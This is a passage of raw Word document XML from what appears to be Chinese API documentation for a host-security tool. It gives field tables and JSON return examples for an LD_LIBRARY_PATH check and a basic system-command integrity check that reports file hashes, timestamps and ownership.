        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2249C245" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02AE8B5D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D252E65" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>安装后路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1DBD8777" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29D403D9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>before_compare_after</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45A457ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CCDEC80" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12F6B655" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>数据的对比</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B0296A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D597361" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ld_library_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">         "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ret_msg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   {</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                  "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bin/find",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                  "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>after_unset_output</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":{},</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                  "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>before_unset_output</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":{},</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                  "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>before_compare_after</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":{}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">              }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">         ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">         "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ret_code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAC48B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="465" w:name="_Toc115166305"/>
      <w:bookmarkStart w:id="466" w:name="检查功能基本命令检查"/>
      <w:bookmarkEnd w:id="464"/>
      <w:r>
        <w:t>检查功能：基本命令检查</w:t>
      </w:r>
      <w:bookmarkEnd w:id="465"/>
    </w:p>
    <w:p w14:paraId="4B6EBE0B"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1661"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="1988"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="658C0EA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27D87EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54D4B0CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E8F34FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56F08E33" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7687FB36" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="491BB5A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>match_rules</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="471480FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78A54206" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76E2D165" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>命令命中的规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7351DD66" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59BD39A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>access_time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B58CECC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="290244DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5718F3E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件的最近访问时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="40A93B8B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26A79542" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>modify_time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0615BA8E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AA28832" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="184F98E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件内容的修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6BD2C7B7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="375E1FBC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>file_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30F439C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24594FE7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="115B04C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="03C1E74A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1044A2A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="341FCABD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42B17CBE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E0B54D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5FFA2700" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40D2C40B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_size</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70B7C2BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54B6F0AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="093C0E38" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2C03AFCE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AB70EBB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>change_time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BBCECB4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19D1AE41" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C16A6A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件属性的修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="12428891" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="247C3D97" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>file_sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D5395D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AA7ED44" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3745F7DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7D82EDC5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D7DEDC2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>file_sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0316DF1B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F79C80E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DFC923D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3DBAE3C0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22E8A6F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_permission</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52590F24" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DA6BCA2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="409F638D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件访问权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5FC8C28E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45C01A30" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_owner</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75B96A51" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65309F2F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1557AE5C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件所属用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="075B1B62" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33DCB833" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_group</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3593449C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DBBE478" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C38BA97" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件所属用户组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D3640FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35680134" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>match_rules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">         "175":".*"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_sha256":"e11183e4d33672e548804659841f3b013f9f366312af9fb85afbba458608e41c",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_sha1":"0e25541ac9b5096df961e3532a84bddde2bd75c5",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "access_time":1550569446,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_md5":"1f30f796aa5218cdca9645990020752c",</w:t>
      </w:r>
      <w:r>
        <w:br/>
